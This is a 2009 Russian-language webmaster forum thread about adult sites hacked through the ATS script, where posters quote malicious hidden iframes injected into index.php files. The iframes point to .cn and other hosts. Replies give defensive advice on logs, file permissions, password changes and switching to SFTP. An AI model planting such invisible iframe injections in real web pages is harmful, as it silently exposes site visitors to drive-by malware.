Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Это взлом или диверсия?
цитата
04/06/09 в 22:16
 Mad Knight
Скрипт ATS 1.8 ротатор Thumbnail Manager Live 1.3

Открываю щас морду своего сиджа, а там заместо сиджа надпись
Parse error: syntax error, unexpected '<' in /home/adults/public_html/index.php on line 9.

Посмотрел файл index
Код:

<?php

$header = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>';

@include('in.php');

@include($page);

<iframe src="http://combinebet.cn:8080/index.php" width=197 height=138 style="visibility: hidden"><
<iframe src="http://thebestwaytofind.cn:8080/index.php" width=142 height=151 style="visibility: hidden"></iframe>


стер я эти два чюдесных инфрейма
теперь голову ломаю что это за херня такая была icon_confused.gif
цитата
04/06/09 в 22:21
 net666
Еще аз зайди посмотри, может тебе это еще кудато прописали и через некоторое время опять восстановится.
цитата
04/06/09 в 22:23
 Woland
Ломанули видать, только ифрейм неграмотно написали, лишний < поставили ... Пни админов, пусть смотрят логи, хотя я не помню - если ats генерит индекс сам - хуй они уже чё там найдут, скорее всего, если логи не за неделю хранятся, конечно ...
цитата
04/06/09 в 22:54
 Mad Knight
Woland: Скорее всего не дописали просто /iframe>
Но тем не менее именно из за этой < качерги они спалились smail101.gif
цитата
05/06/09 в 12:31
 L.Estel
Посмотри владельца index.php. Сам ATS не меняеят. Если владелец не httpd, то твой FTP ассоunt известен еще кому-то. Меняй пароли и чисти комп от вирусов, а вообще юзай SSH и SCP
цитата
09/06/09 в 13:53
 Dimka
ААА... Помогите, поймал ету фигню с ифреймоми (код появляется во всех index файлах). Менял пароли, проверял на вирусы (Пандой и Spybot - Search & Destroy)... Но нет, появляется каждое утро на всех FTP. Что делать не знаю, подскажите кто в курсе icon_sad.gif
цитата
16/06/09 в 08:50
 Bulldog
возможно там в скриптах есть код, который все это дерьмо обновляет, попробуй вычистить все скрипты и установить заново.
цитата
16/06/09 в 09:58
 Woland
Цитата:
ААА... Помогите, поймал ету фигню с ифреймоми (код появляется во всех index файлах). Менял пароли, проверял на вирусы (Пандой и Spybot - Search & Destroy)... Но нет, появляется каждое утро на всех FTP. Что делать не знаю, подскажите кто в курсе


Пинать админов - пусть смотрят логи, что (кто) пишет в файлы и откуда (с сервака или из вне). Если с сервака - удалять, если извне - менять пароли, ограничивать доступ по IP, убирать нахуй ftp протокол с сервера, яростно чистить свой комп и т.д.
цитата
16/06/09 в 14:41
 L.Estel
На индекс файл поставить права 444
цитата
16/06/09 в 15:03
 Woland
Цитата:
На индекс файл поставить права 444
если я правильно помню - у ats индекс генерится скриптом и 444 будут не в тему
цитата
16/06/09 в 15:23
 L.Estel
Woland писал:
если я правильно помню - у ats индекс генерится скриптом и 444 будут не в тему


Неправльно помниш, ATS не генерит индекс. icon_wink.gif
цитата
16/06/09 в 23:48
 von Stoltz
L.Estel писал:
Неправльно помниш, ATS не генерит индекс. icon_wink.gif


И никогда не генерил, создавал при установке и больше не трогал. Но в последней версии index.php идет в дистрибутиве, и о взломе 1.8 я пока не слышал, да и 1.7.2 достаточно надежен.
Так что это либо через фтп залезли, либо с соседнего аккаунта, если хост шареный, 444 в этом случае помогут. Еще можно на templates/*.tpl поставить 444, для спокойного сна. Но если по фтп лезут - не спасет, естественно.
цитата
16/06/09 в 23:56
 Woland
Оффтопик: Ну ладно, ладно ... Я тут пытаюсь какеров на ложный след навести - и от те на, нарисовались, правдолюбы ... smail101.gif

Если серьёзно - ну да, запамятовал, с кем не бывает icon_smile.gif
цитата
17/06/09 в 19:49
 Dimka
Спасибо за ваши ответы... Вот ещё один вопрос, посоветуйте пожалуста менеджер чтоб безопасно загружать файлы на FTP. Все которые я использовал они сохраняют все логины и пароли, а есть разовые, безопасные заходы без сохранения паролей. очень плохо разбираюсь в этих делах, спасибо за понимание...
цитата
17/06/09 в 22:18
 Woland
Цитата:
Все которые я использовал они сохраняют все логины и пароли, а есть разовые, безопасные заходы без сохранения паролей. очень плохо разбираюсь в этих делах, спасибо за понимание...


WinSCP http://winscp.net/eng/download.php не запоминает пароли, если не нажать специально "save", много умеет, бесплатен.
Но лучше не использовать ftp вообще (не поднимать на серваке, это к админам), а юзать sftp скажем, с помощью того же клиента.
цитата
19/06/09 в 11:31
 DrProff
Короче я тебя Очень растрою!
У меня на одном серваке, очень похожая хрень появилась года полтора назад. Что ни делали, все пох. С периодичностью в 2-3 месяца эта хрень появляеться в коде. Как ее побороть ни я ни админы незнают. Что тока не делали поменяли железо и все напрасно,... это блин как герпесс, вроде все поличил а рано или позно всерано вылазит ))))
САМ ГЕРПЕСОМ НЕ СТРАДАЮ, написал для сравнения. icon_smile.gif

Чаще всего в топах протона.
Спасение тока в чмодах 444 на все шаблоны и страницы,...

кста вот мой код, может кто что и мне посоветует

<iframe src=\"http://niklejo.net/?click=DDBD90\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://internetcountercheck.com/?click=16010546\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>
цитата
19/06/09 в 12:44
 Woland
Цитата:
Короче я тебя Очень растрою!
...
...
...


Очень драматичная история, как админы на сервере или ты у себя на компе закладку найти не можешь полтора года - только зачем его то расстраивать ? icon_smile.gif
цитата
25/06/09 в 16:09
 Dimka
Всем спасибо, пока все ОК (тфу-тфу-тфу). Надеюсь так и будет.
цитата
25/06/09 в 20:28
 Mad Knight
А мне вот интересно домены зон (cn) неприкасаемые?
В этой доменной зоне что разрешено распространять вирусы?
цитата
27/06/09 в 14:32
 Woland
Mad Knight: Это китай icon_smile.gif Там ничего нельзя, но всё можно icon_smile.gif
Абузы могут читать только на китайском, например icon_smile.gif
цитата
27/06/09 в 16:52
 Mad Knight
Woland: Как с порно бороться дак это они первые, а как вирусы убирать так извините мы китайцы и по английски не бум бум.
Сволочи они, а не китайцы smail101.gif
цитата
27/06/09 в 17:11
 Woland
Цитата:
Как с порно бороться дак это они первые, а как вирусы убирать так извините мы китайцы и по английски не бум бум.
Оффтопик: А что тебя удивляет - в порно всё понятно без слов, в этом одна из причин его популярности icon_smile.gif


Эта страница в полной версии